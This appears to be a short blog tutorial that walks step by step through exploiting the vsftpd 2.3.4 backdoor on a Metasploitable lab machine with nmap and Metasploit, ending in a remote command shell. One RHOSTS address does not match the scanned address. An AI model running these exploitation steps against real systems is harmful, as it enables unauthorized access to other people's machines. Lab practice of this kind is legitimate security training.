Disclaimer
This article is Just for educational purpose Author does'nt promote illigal activity
As you can see I am using metasploitable machine for Exploitation in other terminal first need to scan victim system's Ip address, let's scan
Using command:
nmap 192.168.110.131 -sV
Here -sV is service version
and 192.168.110.131 victim ip address
First we start metasploit for payloads by typing command:
msfconsole
and hit enter 2nd search payload for ftp service
msf5 > search ftp
msf5 > search vsftpd
And 2nd of you can see exploit/unix/ftp/vsftpd_234_backdoor
Available
Show payloads
set payload cmd/unix/interact
set RHOSTS 192.168.110.113
We ll exploit payload by typing command
exploit or run
As you can see
Command shell session 1 opened
It mean we hacked victim machine
By typing ls command you can see all directories of Target system exist here
This article was v.interested, hackers use this method to hack your system and Servers
If you really like this article please share with friends for better information













No comments:
Post a Comment